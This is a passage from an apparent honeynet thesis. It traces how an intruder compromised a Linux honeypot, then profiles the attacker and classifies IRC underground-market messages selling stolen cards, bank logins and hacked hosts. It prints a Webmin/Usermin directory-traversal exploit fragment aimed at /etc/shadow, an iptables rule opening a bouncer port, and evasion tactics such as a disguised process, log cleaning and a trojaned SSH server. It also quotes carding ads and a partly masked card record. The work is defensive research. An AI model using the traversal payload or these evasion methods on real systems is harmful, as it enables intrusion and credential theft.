The attacker returns on the following day at 06:45:14 p.m. In contrast to the preceding session, the blackhat does not clean the log files but solely invokes the w command to verify no other users are currently logged in on the machine. In the next step, the psyBNC [32] IRC bouncer is retrieved from a private website and saved to a newly-created hidden directory. An IRC bouncer acts as an intermediary between an IRC (Internet Relay Chat) server and a corresponding client. Thereby, it is, for instance, possible to maintain a connection with a certain communication channel, even if the client exits at a specific point of time (cmp. Jestrix, 2003). As we will see later, this characteristic is extremely beneficial to the intruder. Before the application is executed, the adversary manipulates the IPTables packet filtering software and adds a new rule:

    /sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT

According to this rule, incoming TCP requests that are destined for port 8080 are to be accepted. The rule is required by the bouncer to properly process inbound traffic. At 06:46:22 p.m., psyBNC is finally run and starts working. In order to appear as inconspicuous as possible, the main executable has been renamed to httpd and, thus, is disguised as an instance of the httpd web server.
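Renaming an executable to httpd only deceives observers who look at process names alone. As a minimal sketch of how such a disguise might be spotted, the following function compares the full executable path of each process with an allow-list of expected locations. The allow-list, the process IDs, and the sample paths are hypothetical; the thesis does not state where the renamed binary was stored.

```python
from pathlib import PurePosixPath

# Assumed install location of a genuine httpd binary (hypothetical allow-list).
EXPECTED_PATHS = {"httpd": {"/usr/sbin/httpd"}}


def find_masquerading(processes, expected=EXPECTED_PATHS):
    """Return (pid, exe_path) pairs whose file name is well known but whose path is unexpected.

    processes: iterable of (pid, exe_path) tuples.
    """
    suspicious = []
    for pid, exe_path in processes:
        name = PurePosixPath(exe_path).name
        allowed = expected.get(name)
        if allowed is not None and exe_path not in allowed:
            suspicious.append((pid, exe_path))
    return suspicious


# Hypothetical process table: one genuine web server, one disguised binary.
table = [
    (812, "/usr/sbin/httpd"),
    (4711, "/var/tmp/.hidden/httpd"),
    (1, "/sbin/init"),
]
print(find_masquerading(table))  # [(4711, '/var/tmp/.hidden/httpd')]
```

On a Linux system, the executable paths could be collected from the /proc/<pid>/exe symbolic links; note that a check of this kind no longer helps once a rootkit hides the process altogether.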
[32] see http://www.psybnc.at/

April 18

On April 18, a new encrypted network session is established with our decoy at 09:17:14 in the morning. The intruder quickly checks the list of users that are currently logged in and begins to download a compressed archive from a web server with the IP address 85.204.xxx.xxx. The archive contains multiple tools and scripts that can be used to scan hosts for instances of the Webmin [33] and Usermin [34] web applications. These applications provide graphical interfaces for basic administrative tasks (see Cameron, 2003). Versions prior to 1.290 and 1.220, respectively, do not properly sanitize user-specific input. As a result, attackers are able to access arbitrary files on the system of the victim (see SecurityFocus, 2006d; CVE, 2006a). These security weaknesses may be automatically exploited with a number of utilities that are included in the archive as well. To make the procedure as easy as possible, a small helper script coordinates the interactions between the different components. A flowchart of the activities is displayed in Figure 5.24.

To initiate the attack sequence, an adversary simply needs to invoke the script go with the address of a class B network. This information is passed to ss, a simple network scanner that is identified as the Fast SYN Scanner by DrBIOS [35]. The program sends two TCP synchronize (SYN) packets to each machine within the selected network range, more precisely, to the system ports 10000 and 20000 the Webmin and Usermin web applications listen on (see Cameron, 2003). If a packet is acknowledged, an active service has been found, and the IP address of the host is logged. At the end of the operation, the generated log file is processed by the scripts start, do, and mycnf that check whether systems in the selected network segment are affected by the vulnerability.
If this is the case, the individual servers are attacked for the first time, and the /etc/passwd file of the victim is retrieved in order to extract the list of valid system users. For this purpose, a small Perl program a.pl must be executed. It stores the actual exploit code that is illustrated in Listing 5.11.

     1  #!/usr/bin/perl
     2
     3  ...
     4  # generate a series of ../ instructions to break out of the root
     5  # directory of the web server
     6  $temp = "/..%01" x 80;
     7  ...
     8  # exploit the file disclosure vulnerability
     9  my $url = "http://" . $target . ":" . $port . "/unauthenticated/" .
    10      $temp . $filename;
    11
    12  # retrieve the file
    13  $content = get $url;

Listing 5.11: Exploit for the Webmin and Usermin Web Applications

The malicious directory traversal technique shown in Line 6 and 9 of Listing 5.11 is used during a second attack to disclose further resources, including the /etc/shadow file that saves hashes of the system passwords, various configuration files, and the command histories of the users. In the last step, the captured shadow file is read in by john, a popular password cracking program [36], to start a brute force or dictionary attack on the encrypted authentication credentials. If this attack succeeds, control over additional machines may be gained. For this reason, the adversary intends to probe both a single system with the IP address 65.165.xxx.xxx and an entire network of a Belgian Internet service provider. However, even though all utilities described above are fully functional, these attempts remain unsuccessful, because the intruder fails to replace a hard-coded name for the network interface card (eth1) with the correct, system-specific value (eth0). As a result, the scanning process is aborted, and no outbound connections are established. Being obviously dissatisfied with the results, the blackhat deletes the complete toolkit and logs out at 09:27:21 a.m.

Figure 5.24: Flowchart Diagram of the Captured Attack Tools

[33] see http://www.webmin.com/
[34] see http://www.webmin.com/usermin.html
[35] see http://www.securiteam.com/tools/5EP0B0ADFO.html
[36] see http://www.openwall.com/john/

About two hours later, at 11:16:01 a.m., the attacker returns and downloads an archive with the eggdrop software [37] from an FTP server with the IP address 58.254.xxx.xxx. Eggdrop provides numerous so-called bot functions for an IRC server. It is, for instance, capable of automatically monitoring specific communication channels and serving requests (cmp. Pointer, 1997). After extracting the program into the home directory of a non-privileged user, the intruder retrieves a required static library and briefly edits several configuration files. At 11:30:56 a.m., the bot is executed and joins the IRC network. With the help of psyBNC that is installed on our honeypot, the adversary is able to reconfigure the eggdrop application at all times. Furthermore, when participating in an IRC communication channel, solely the IP address of our machine is revealed (cmp. Jestrix, 2003). Thus, the real identity of the attacker may be effectively concealed. On the other hand, due to the devices running on our Honeywall, we are also able to monitor a great part of the activities the blackhat is involved in. An analysis of these activities is the subject of Section 5.4; an evaluation of the attack as well as a description of the alleged motives and characteristics of the intruder are presented below.

5.3.2.2 Evaluation of the Attack

The adversary launches an automated password brute force attack on our honeypot and succeeds in compromising the weakly protected root superuser account of the operating system.
After logging in and carefully covering her traces, the intruder retrieves several archives from different servers on the Internet. These archives comprise a trojaned version of an SSH server that is installed on our decoy to secretly record usernames and passwords, a network scanner, and multiple attack tools and scripts. Although the blackhat attempts to probe several external networks, the respective systems are not put at risk at any time due to the protection mechanisms of our Honeywall. However, the attacker manages to set up bouncer software as well as a so-called bot for the IRC network on our machine. As we will see in Section 5.4, these programs help the blackhat administrate a covert communication channel and participate in some type of underground economy. A brief description of the individual files and archives we have captured during the intrusion can be found in Table 5.9; an overview of the entire incident is given in Figure 5.25.

[37] see http://www.eggheads.org/

Table 5.9: Attack Tools Used During the Compromise of the Linux Honeypot

Attack Tool: m
MD5 Checksum: 9b0e266c08e8983f0c3e42a12bece88c
Description: Log cleaning utility MIG Logcleaner 2.0 that is used by the adversary to manipulate the system log files and cover the traces of the intrusion.

Attack Tool: backdoor
MD5 Checksum: df192b169644892a7d85064d9c5b2f41
Description: Trojaned version of the secure shell server. After the service is installed on the honeypot, the adversary may gain access to the system by entering a magic password. Additionally, the authentication credentials of legitimate users are transparently written to a secret file when logging in.

Attack Tool: ss
MD5 Checksum: b51a52c9c82bb4401659b4c17c60f89f
Description: Network scanner DrBIOS Fast SYN Scanner. The tool is capable of probing system ports of a large number of systems within a short amount of time.

Attack Tool: psybnc
MD5 Checksum: 54a6d04d4605f251d4caf6dc76af39d0
Description: Compressed archive that contains the source code files of the psybnc IRC bouncer. With the help of the bouncer, the adversary is able to join communication channels on the IRC network without revealing her real IP address and identity.

Attack Tool: olinie.tar.gz
MD5 Checksum: a5712fbed957d4ae9d0c6cdd93ec4d7b
Description: Archive that stores 14 attack tools and scripts to probe servers for vulnerable instances of the Webmin or Usermin web applications. In case a security weakness is found, the respective machines are automatically exploited, and sensitive information such as usernames and passwords is transferred to the attacking host.

Attack Tool: eggdrop
MD5 Checksum: 99c1b3bdf7297e764030aeadfb05b1df
Description: Source code archive of the eggdrop bot software. The program provides various automatic monitoring and administrative functions for IRC communication channels.

Figure 5.25: Timeline of the Attack on the Linux Honeypot

5.3.2.3 Profile of the Attacker

Similar to the attack on our Windows honeypot, we attempt to create a basic profile of the adversary based on the pieces of evidence we collected and draw conclusions about her origin, her technical expertise, and her motivations. A more detailed taxonomy and classification of the intruder is the subject of Section 5.3.2.4.

Presumable origin of the attacker: In sum, six systems that are scattered over three continents are involved in the incident: The password brute force attacks are traced to a server in North America. All encrypted connections, on the other hand, are initiated from a computer located in Italy. Last but not least, the additional software applications and archives that are downloaded to our decoy during the intrusion are stored on four different machines in the United States, China, and Romania. Taking these aspects into consideration, we have reason to believe the blackhat intentionally obscures the source of her attack.
Thus, the geographical location of a host does not necessarily imply the real origin of the intruder. However, after a more in-depth investigation of the compromise, we find two indications that the adversary is Romanian or of Romanian descent: First, a great part of the attack tools and scripts that are transferred to our honeypot contain Romanian messages and instructions [38]. Second, the attacker joins several private communication channels on the IRC network and chats in Romanian before finally joining an English-speaking underground market (see Section 5.4).

Presumable expertise of the attacker: On the one hand, the adversary appears to have a certain experience with Linux-based intrusions. With the help of multiple pre-packaged archives, our decoy is quickly penetrated and brought under the full control of the blackhat. She also makes sure to cover her traces and restricts most of her stays to short periods of less than 15 minutes. On the other hand, the intruder is unable to properly operate some of the attack tools that are downloaded to our machine and fails to specify correct program variables. As a consequence, several attempts to probe external networks for vulnerabilities repeatedly fail. Moreover, processes that are executed on the system are not effectively hidden from administrators or other maintenance personnel, e.g., by installing a rootkit as has been done in the compromise of the Windows-based honeypot. That is why we presume the technical expertise of the attacker is quite limited and restricted to a number of step-by-step activities.

Presumable motivations of the attacker: With the help of the MEECES model that we have briefly introduced in Section 5.3.1.3, we attempt to identify the prevalent motivations of the adversary that eventually led to the incident.
In contrast to the attack on our Windows-based honeypot, we did not find any evidence that the intrusion was ego- or sociologically driven, i.e., the compromise was neither carried out solely for confidence-related reasons, nor for gaining entrance to a social group or enhancing status. Additionally, we did not find any messages, logos, or other types of personal statements that indicate a political or ideological motivation. Given that the intruder made sure to cover her traces, subverted a system daemon, and systematically tried to probe external network segments for vulnerabilities, we believe the attack has a serious intention and must not be regarded as purely playful, i.e., for entertainment purposes. In fact, our system acts as an intermediary for joining a covert communication channel. As we will see in Section 5.4, various hacking-related goods and services such as stolen credit cards or access to compromised online accounts are advertised for sale in this channel. For this reason, we conclude that the attacker ultimately strives to profit financially from the intrusion.

[38] Thanks to Viviana Nichica for translating the messages.

5.3.2.4 Taxonomy and Classification of the Attacker

Based on the technical expertise and the motivational drivers we have identified in the previous section, we attempt to categorize the attacker in compliance with the two-dimensional taxonomy framework developed by Rogers (2005) (cmp. Section 5.3.1.4). As we have outlined, a meaningful and empirically valid classification helps “arrive at some type of understanding about the motivation of individuals engaged in hacking” and overcome the hurdles researchers face when studying miscreants (see Rogers, 2000a, p. 1-2). According to the framework, we classify the intruder we have observed as a petty thief. As Rogers (2005, p. 4) points out, these types of computer criminals are motivated by financial gain and greed.
They “learn the prerequisite skills necessary to perpetrate the crime”, as “the successful use of technology is crucial in order for them to fulfill their need for money”. Due to these characteristics, petty thieves may become skilled over time even if they appear to be technically less proficient at first and, thus, represent a serious threat (cmp. Liu and Cheng, 2009).

5.4 Analysis of an Underground Communication Channel

As we have outlined in the previous section, an adversary managed to set up a so-called bouncer and an IRC bot after successfully breaking into our Fedora-based Linux honeypot. With the help of these applications, the intruder was able to uphold a permanent connection with the Internet Relay Chat network as well as automatically perform certain administrative tasks within a specific underground communication channel. These tasks included generating access rules for other channel members and providing basic usage statistics. In cooperation with two additional bots that were already residing in the channel, the attacker could thus effectively stay in control of the room. With the help of the Honeywall, we were able to monitor a great part of the activities over a period of about 10 weeks, from April 20, 2008 to June 30, 2008, and revealed some form of underground market for hacking-related goods and services. An overview of this market and its participants is presented in the following section.

5.4.1 Overview about the Captured Data

During the observation period, we recorded more than 676,000 messages that were publicly exchanged between the different channel members. As shown in Figure 5.26, the number of messages sent per day varied from about 2,700 on April 25 to more than 21,000 on May 22. On an average day, we monitored slightly less than 12,000 messages.
Similarly, the number of active users in the channel as identified by their unique nickname (“nick”) varied between 18 on April 27 and 79 on May 10 (see Figure 5.27). On average, 49 users were logged on and posted at least one message on any given day.

Figure 5.26: Number of Messages Sent per Day to the Communication Channel

A large share of the messages were sent to the channel repeatedly. In many cases, for instance, automated scripts and programs periodically retransmitted specific, pre-defined lines of text. For this reason, we were able to reduce the total text corpus to a comparatively small set of 4,165 unique messages, ordered by their frequency. To assess the recorded communication more accurately, we manually categorized and labeled the 417 most frequent messages (10% of the unique messages) in the next step. Due to the characteristics of the frequency distribution of the text corpus, these messages covered 84.5% of all captured posts. The results of our analysis are outlined in the next section.

Figure 5.27: Number of Active Users per Day in the Communication Channel

5.4.2 Analysis of the Labeled Data

The 417 chosen messages were identified as either advertisements for various hacking-related goods and services, corresponding requests, or both. As indicated in Figure 5.28, offers comprised about three quarters of the data set and outnumbered requests almost five to one. In order to thoroughly classify the different samples, we assigned each message to one or more categories that are not mutually exclusive (see Figure 5.29). For instance, the message shown in Listing 5.12 advertises both stolen credit cards as well as access to hacked online accounts and, thus, is assigned to two categories. In the following, we analyze the labeled data in more detail and illustrate the individual categories with the help of selected examples.
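The frequency-based reduction described in Section 5.4.1 (collapse repeated posts, rank the unique messages by frequency, and measure how much of the log the most frequent ones cover) can be illustrated with a short sketch. This is not the tooling used in the thesis; the function name `coverage_of_top_fraction` and the toy messages are assumptions made purely for illustration.

```python
import math
from collections import Counter


def coverage_of_top_fraction(messages, fraction=0.10):
    """Return (unique_count, top_k, share_of_posts_covered).

    `messages` is the raw list of posts, repeats included. The top_k most
    frequent unique messages are the ones that would be labeled manually.
    """
    counts = Counter(messages)                    # frequency of each unique message
    unique_count = len(counts)
    top_k = max(1, math.ceil(unique_count * fraction))
    covered = sum(n for _, n in counts.most_common(top_k))
    return unique_count, top_k, covered / len(messages)


# Hypothetical toy log: two heavily repeated advertisements and one chat line.
posts = ["Selling CCz"] * 6 + ["Buying cvv2"] * 3 + ["hello"]
unique_count, top_k, share = coverage_of_top_fraction(posts, fraction=0.5)
print(unique_count, top_k, share)
```

Because automated scripts retransmit the same lines over and over, a small fraction of the unique messages can account for most of the recorded posts, which is the effect reported above.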
    "Selling EU Dumps + Pin [track1/track2] || Paypal accounts with good balance [verified/unverified] || (...) Dont waste my time or i will ignore you || For Deal ICQ: <xxx>"

Listing 5.12: Sample Advertisement for Hacking-Related Goods

Figure 5.28: Distribution of Offers and Requests for Hacking-Related Goods and Services

Figure 5.29: Types of Hacking-Related Goods and Services

5.4.2.1 Credit Card-Related Offers and Requests

In almost 4 out of 10 cases, adversaries posted advertisements for stolen credit cards and credit card-related information. As McCarty (2003, p. 91) points out, the data may either come from computer intrusions or be physically provided by morally questionable personnel working at local banks, hotels, or restaurants. In the course of our analysis, we have made similar observations. Oftentimes, the information included both the personal identification number (PIN) of the victim as well as her card verification value (CVV2). The latter is a three-digit identification code that is frequently used for verifying the legitimacy of a credit card during online transactions (cmp. Visa Inc., 2002). Two typical messages for such offers that we have captured during the observation period are shown in the first two lines of Listing 5.13. As can be seen in the second example, a blackhat advertises 30 newly acquired (“fresh”) credit cards (“CCz”) for $200. In contrast, we found corresponding requests in only 13.25% of the selected data set. Two representative sample messages are displayed in the second half of Listing 5.13.

    "Selling valid fresh unused Mastercards/Visa/American Express (...)"
    "Selling Fresh France CCz With Cvv2 (...) 30 ccz = 200 $ (...)"

    "Buying all valid cc’s Visa or Mastercard 7 $ Each! (...)"
    "I need cvv2 From Italy, Who have privat me (...)"

Listing 5.13: Sample Advertisements and Requests for Stolen Credit Cards and Credit Card-Related Information

5.4.2.2 Cash Out-Related Offers and Requests

As Thomas and Martin (2006) argue, one of the biggest challenges for Internet miscreants is to safely cash out the illegally obtained funds while mitigating the risk of getting caught by law enforcement authorities at the same time. For this reason, blackhats frequently cooperate with so-called cashiers, i.e., brokers who are willing to clean out the bank accounts of the victims. For a pre-defined, fixed fee, e.g., 50% of the total amount, the cashier transfers the money directly to the adversary, typically within hours, by using online or offline services as offered by Western Union (WU) [39] or E-Gold [40] (see also Franklin and Paxson, 2007). In many cases, additional third parties, so-called confirmers, are involved in this process as well and verify incoming payments. Alternatively, the money may also be moved to a drop, an intermediary domestic or offshore account, that helps impede prosecution and facilitates money laundering (cmp. Thomas and Martin, 2006, p. 11-12). A summary of common advertisements and requests for cashiers, confirmers, and drops can be found in Listing 5.14.

[39] see http://www.westernunion.com/
[40] see http://www.e-gold.com/

    "Cashout USA Visa FULL INFO! = 50:50% SHARE! Legit Chaser! (...)"
    "CASHING OUT MONEYBOOKERS ACCOUNT. (10.000 $ / DAILY)"
    "Confirm Western Union ... PRV ME"
    "I Got Legit U.S.A Item Drop, Split 50/50"

    "I am looking for someone in US that can cashout pins. (...)"
    "SPAMMER looking for some deals/trustable casheers.!!!"
    "I’m looking for a WU confirmer for long term business (...)"
    "Looking for a USA/Canada Drop, USA/Canada CVV Cashier (...)"

Listing 5.14: Sample Advertisements and Requests for Cashiers, Confirmers, and Drops

5.4.2.3 Further Financial Account-Related Offers and Requests

In addition to credit cards, their corresponding PINs, and CVVs, several other types of financial account-related information were frequently offered and requested in the underground communication channel we observed. For instance, in 12.75% of all cases, adversaries advertised online logins for various major national and international banks, e.g., HSBC, Halifax, the Bank of America (BOA), Chase, and Wells Fargo. Furthermore, blackhats frequently offered access to numerous compromised online accounts, most importantly to PayPal, an electronic money transfer service, and Amazon, the world’s leading Internet retailer (cmp. Brohan, 2009). On the other hand, with shares of 1.75% and 1%, respectively, requests for these goods and services were rare (see Figure 5.29). Two sample messages for each category are illustrated in Listing 5.15.

    "Selling BOA for 20 $ Hurry, Only Few to sell, Accept e-gold"
    "Selling (...) ShopAdmins, Paypalz, Amazons,(...) Accept WU!"

    "(T)rade for PayPal and some bank logins - (...) icq <xxx>"
    "BUYING ALL VERFIED PAYPALS E-GOLD/WEST UNION"

Listing 5.15: Sample Advertisements and Requests for Bank Logins and Online Accounts

5.4.2.4 Hacking-Related Offers and Requests

In almost one out of seven messages of the sample data, adversaries offered hacked hosts for sale. These hosts may, for instance, serve as intermediaries for further attacks or to make tracing more difficult (cmp. Honeynet Project, 2004c). As indicated in Listing 5.16, blackhats periodically advertise larger numbers of penetrated systems in the form of botnets as well.
Depending on its size, a botnet may potentially cause severe havoc, e.g., when bringing down the network of a business competitor during a Distributed Denial of Service (DDoS) attack (see Provos and Holz, 2007; Mirkovic and Reiher, 2004). Compromised machines may also be used for spamming or phishing campaigns. In the latter case, an attacker first sets up a so-called scam page that mimics the web site of a legitimate, trusted service provider. In the next step, unaware computer users are lured into visiting the fraudulent page, typically by means of specially crafted email messages (cmp. Watson et al., 2005). The victims are then tricked into entering their online credentials or other sensitive information that is particularly interesting for Internet miscreants. In 8.75% of the samples, adversaries explicitly advertised these types of services; 9.5% of the labeled data contained spam-related offers. Except for spamming operations, corresponding requests were practically negligible. A number of selected messages that we have obtained in the channel are presented in the lower half of Listing 5.16.

    "(S)elling hacked roots: linux, freeBSD, sunOS; hacked shells (...)"
    "Selling botnets/bots For Reasonable Prices .. /msg for Instant deals"

    "I want to buy root`s or remote desktop msg me payment via e-gold"
    "NEED REMOTE FROM USA - ADMINISTRATOR -> TRADE FOR ROOT URGENT!"

    "I can host scampages ... /q <Nick> for details"
    "Selling Fresh 5 Million Email List For Spamming"

    "I need Scam Page Designer!! Msg me now!!"
    "I am looking for a Spammer to be parteners!!!!"

Listing 5.16: Sample Advertisements and Requests for Hacked Hosts
5.4.2.5 Personal Information-Related Offers and Requests

In addition to credit card-related information, adversaries frequently advertised so-called fulls, i.e., personal data that included the full address of the cardholder, her phone number as well as her email address. Sample records such as the one shown in Listing 5.17 were periodically posted to the channel, possibly as a proof of possession or to stimulate demand. On the other hand, we measured corresponding requests in less than 1% of the labeled data, even though these pieces of information may facilitate any kind of identity theft (cmp. also McCarty, 2003). An overview of typical messages that we have captured during the observation period is given in Listing 5.18.

    Credit Card Number: 52xxxx1733xxxx3x
    CVV:                761
    Expiry Date:        06/10
    Name:               Eurie <...>
    Address:            <...> Ave Apt 3
    ZIP:                <...>
    State:              Texas
    Country:            United States
    Phone Number:       <...>
    Email Address:      <...>@msn.com

Listing 5.17: Example of a Full Personal Record

    "Sell Fresh Full Info & Cvv2 (AU, CA, UK, US, IT, SP, EU) (...)"
    "SELLING CANADIAN ID’S, Be anyone you WANT! Great for WU Pickups (...)"

    "Need Valid US Cvv2 & Full info (...) Msg. me Ready to Deal A.S.A.P!!!"

Listing 5.18: Sample Advertisements and Requests for Personal Data

5.4.2.6 Equipment-Related Offers and Requests

The hardware equipment which is needed to retrieve credit card-related information was also offered for sale in the communication channel we have monitored. In particular, blackhats advertised so-called skimmers as well as cameras for automated teller machines (ATMs) to secretly record the PIN and the respective carding data when a victim withdraws money from her account. The latter may then be processed by an MSR-206 magnetic card writer that creates a new, valid duplicate. Prices for such devices varied between $400 and $600 in the channel.
Two typical product advertisements and a request that we encountered are shown in Listing 5.19.

    "Selling ATM SKIMMER + MSR206 with 5 blank magnetic cards (...)"
    "ATM Skimmers, Cameras, MSR206, Readers, etc. for sale (...)"

    "LOOKING FOR MSR 206 / MSG FOR MORE INFO."

Listing 5.19: Sample Advertisements and Requests for Hardware Equipment

5.4.3 Classification of the Entire Text Corpora

As we have outlined, with the help of the manually labeled data, we were able to classify more than four fifths of the entire text corpus. In order to assess the remaining messages that we have captured in the channel during the observation period, we use statistical machine learning techniques that automatically associate each post with a meaningful descriptor. Thereby, we are able to split the text corpus into different message categories and can roughly estimate the number of advertisements for hacking-related goods and services, corresponding requests, and other types of posts. Examples of the latter are recorded conversations between two adversaries that may or may not be directly related to the underground economy.

Figure 5.30: Process of a Machine Learning-Based Text Classification

Machine learning-based text classifications have already proven useful in the past for analyzing monitored IRC communications (see Franklin and Paxson, 2007; Elnahrawy, 2002; Mazzariello, 2008). Generally, the classification process is twofold (cmp. Sebastiani, 2002; Manning et al., 2008): In the first step, various example documents are passed as training data to a classification software. The training data are required to “learn” the prevailing characteristics of the categories of interest and build an apposite statistical model. On the basis of this model, new, unknown documents may then be properly classified in the second step. An overview of the operations is given in Figure 5.30.
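The two-step process described above (learn a statistical model from labeled examples, then classify unknown documents) can be sketched with a small multinomial Naive Bayes classifier using add-one smoothing. This is an illustrative stand-in written for this text, not the classification software used in the thesis; the class `NaiveBayes`, the whitespace tokenizer, and the training messages are all assumptions.

```python
import math
from collections import Counter, defaultdict


def tokenize(text):
    """Lower-case whitespace tokenizer (a simplification for this sketch)."""
    return text.lower().split()


class NaiveBayes:
    """Minimal multinomial Naive Bayes with add-one (Laplace) smoothing."""

    def __init__(self):
        self.class_docs = Counter()              # number of training documents per category
        self.word_counts = defaultdict(Counter)  # token frequencies per category
        self.vocab = set()

    def train(self, examples):
        # Step 1: learn category characteristics from (text, label) pairs.
        for text, label in examples:
            self.class_docs[label] += 1
            for token in tokenize(text):
                self.word_counts[label][token] += 1
                self.vocab.add(token)

    def classify(self, text):
        # Step 2: pick the category with the highest log-posterior score.
        total_docs = sum(self.class_docs.values())
        best_label, best_score = None, -math.inf
        for label, n_docs in self.class_docs.items():
            score = math.log(n_docs / total_docs)
            total_words = sum(self.word_counts[label].values())
            for token in tokenize(text):
                count = self.word_counts[label][token]
                score += math.log((count + 1) / (total_words + len(self.vocab)))
            if score > best_score:
                best_label, best_score = label, score
        return best_label


# Hypothetical training messages, loosely modeled on the listings in this chapter.
training = [
    ("selling fresh cvv2 and dumps", "offer"),
    ("selling hacked roots and shells", "offer"),
    ("buying valid cvv2 msg me", "request"),
    ("looking for a wu confirmer", "request"),
    ("hello how are you today", "other"),
    ("what time is it there", "other"),
]
model = NaiveBayes()
model.train(training)
print(model.classify("selling paypal accounts"))
print(model.classify("looking for a cashier"))
```

With only a handful of training messages the model is of course not reliable; the sketch only shows how the training and classification steps relate to each other.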
Category | Precision Value | Recall Value
Advertisements for Hacking-Related Goods and Services | 92.13% | 75.73%
Requests for Hacking-Related Goods and Services | 82.13% | 73.28%
Other Types of Posts | 54.71% | 90.80%

Table 5.10: Average Precision and Recall Values of the Training Data

For our purposes, we run the statistical classification software rainbow that was developed by Andrew McCallum [41]. It implements several different classification algorithms and approaches, e.g., the probabilistic Naive Bayes approach which is chosen by default and is considered to be “one of the most efficient and effective inductive learning algorithms for machine learning” (see Zhang, 2004). Alternatively, example-based classifiers such as the k-nearest neighbor (KNN) or linear support vector machines (SVMs) may be applied for the text classification task as well. The latter are described in detail by Joachims (2002) but are not taken into consideration in our case.

Regarding the first, learning-oriented phase, we train the rainbow package with a number of pre-selected example messages for each of our categories. We then check the robustness of the generated model in five test trials: In each trial, we randomly select 20% of the training data for testing and calculate both the precision and recall values. The precision and recall values determine the effectiveness of a classification operation and are defined as (cmp. Sebastiani, 2002):

\[ \text{Precision} = \frac{\text{Number of Correct Positives}}{\text{Number of Predicted Positives}} \tag{5.1} \]

\[ \text{Recall} = \frac{\text{Number of Correct Positives}}{\text{Number of Actual Positives}} \tag{5.2} \]

The final scores for the different categories after the five test trials are listed in Table 5.10. As can be seen, both the randomly selected example advertisements as well as the corresponding requests are classified quite well.
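As a worked illustration of Equations 5.1 and 5.2, the following sketch computes precision and recall for one category from a list of true labels and a list of predicted labels. The function name `precision_recall` and the five toy labels are assumptions for illustration only; they are not taken from the thesis data.

```python
def precision_recall(actual, predicted, positive):
    """Compute (precision, recall) for the category `positive`.

    Correct positives are posts whose true and predicted label both equal
    `positive`; the denominators follow Equations 5.1 and 5.2.
    """
    correct = sum(1 for a, p in zip(actual, predicted)
                  if a == positive and p == positive)
    predicted_positives = sum(1 for p in predicted if p == positive)
    actual_positives = sum(1 for a in actual if a == positive)
    precision = correct / predicted_positives if predicted_positives else 0.0
    recall = correct / actual_positives if actual_positives else 0.0
    return precision, recall


# Hypothetical hold-out sample of five posts.
actual = ["offer", "offer", "offer", "request", "other"]
predicted = ["offer", "offer", "request", "request", "offer"]
print(precision_recall(actual, predicted, "request"))
print(precision_recall(actual, predicted, "offer"))
```

In this toy sample, every actual request is found (high recall), but one of the two posts predicted as a request is in fact an offer, which lowers the precision for that category.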
In contrast, chat-related types of messages unfortunately attain only a mediocre precision, which is likely caused by a lack of good sample data. Since our research focus is set on the first two categories, however, our model appears to be sufficiently robust to categorize the entire text corpus. To effectively carry out the classification task, we develop a simple client for the rainbow package that passes the 676,084 messages, one at a time, to the software. With the help of the client, we are able to complete the categorization within a short amount of time. The results of the operation are illustrated in Figure 5.31: We estimate that more than 95% of all captured messages either offer or request hacking-related goods and services, while offers outnumber requests more than 5 to 1. In turn, conversations between adversaries and other, non-categorized types of posts account for only about 4.8% of the text corpus and, thus, play only a minor role in an analysis of the communication channel.

[41] see http://www.cs.cmu.edu/~mccallum/bow/rainbow/

Figure 5.31: Estimated Distribution of Offers and Requests in the Text Corpora

5.4.4 Noticeable Characteristics of the Underground Market

In the remainder of this section, we briefly illustrate various characteristics of the underground market we have observed that we find noteworthy. First, the market is affected by a high fluctuation: 64.54% of the 1,345 unique nicks we have measured during the observation period stayed on the channel for only one day.
Furthermore, as indicated by the cumulative distribution function displayed in Figure 5.32, in more than 95% of all cases, the active lifetime of a nick was less than a week, and only a small core of 36 nicks remained active for 10 days or more [42]. Possible reasons for this distribution may be among the following but still need to be researched more closely in the future:

• A large group of users either complete their transactions within a short amount of time, or they quickly leave the channel because their expectations are not sufficiently met, alternative channels are more promising, or due to a general lack of real interest in the underground economy.

• A small number of users appear to be seriously intrigued by the market activities. These core users presumably show a high involvement in the underground economy, strive for strong (business) relationships with other Internet miscreants, and seek to maximize their profit margins in the long term (see also Franklin and Paxson, 2007).

[42] The active lifetime of a nick indicates the total number of days on which a nick has actively participated in the underground market and has posted at least one message to the channel.

Figure 5.32: Active Lifetime of Nicks in the Communication Channel

Apart from the high fluctuation, other prevailing characteristics of the underground market are a high level of uncertainty and, as Franklin and Paxson (2007) term it, a “culture of dishonesty and distrust”: Many participants appear to be constantly concerned about “getting ripped”, i.e., falling prey to fraud, as the extracts shown in Listing 5.20 suggest.

    "HAVE VIRGIN USA SKIMMED DUMPS FOR SHOPPING (...) RIPPERS DON’T WASTE MY TIME! CONTACT ME ONLY IF YOU’RE FOR REAL."

    "CASHING CANADIAN DUMPS, 50/50 Share, No Rippers! Serious People Only!"

    "Selling EU dumps with pin [track1/track2] (...) NO KIDS, NO TESTS, NO RIPPERS.... IF YOU WASTE MY TIME I WILL IGNORE YOU!!! (...)"

Listing 5.20: Sample Messages Indicating Distrust in Other Market Participants

In case a fraudulent operation is detected, the victim usually posts a warning message for other users to the channel, and the “ripper” is excluded from the market. Similar observations are also reported by Thomas and Martin (2006). As pointed out by Franklin and Paxson (2007, p. 13), however, these warning mechanisms may also be used against the underground community to see a “marked decrease in the number of successful transactions”: In a so-called slander attack, the status of honest sellers is systematically eliminated through false defamation. The authors argue that quality sellers are thus driven out of the market as they increasingly lose their customer base and are unable to maintain their price level (cmp. also Akerlof, 1970). In the long term, a lemon market situation is created, buyers can no longer reliably distinguish the quality of goods and services, and the respective economy eventually collapses. As Franklin and Paxson (2007, p. 13) conclude, this is “a desired outcome”.

5.5 Summary

In this chapter, we have outlined the implementation, deployment, and analysis process for a honeynet setup with three electronic baits. Our decoys were based on both Microsoft Windows and Linux operating systems. We have installed various services and applications that were intentionally configured insecurely or contained well-known vulnerabilities. To mitigate risks for external third parties as best as possible in case of an intrusion, we have deployed the Honeywall, an observation and filtering gateway device that is capable of controlling traffic going to or coming from the individual honeypots. We have also introduced several tools and applications that greatly support security professionals when capturing and analyzing malicious activities.
In the course of the thesis, we have witnessed a large number of penetration attempts from all over the world. We gave a brief overview of the collected data and illustrated typical threats and attack patterns. Two system compromises were presented in detail. We have examined the tools and tactics of the different intruders and developed basic profiles to determine their motives more accurately. We were also able to monitor a communication channel that was extensively used by adversaries. The results of these observations helped gain insight into the hacking community and reveal some kind of underground economy.

6 Synopsis and Conclusion

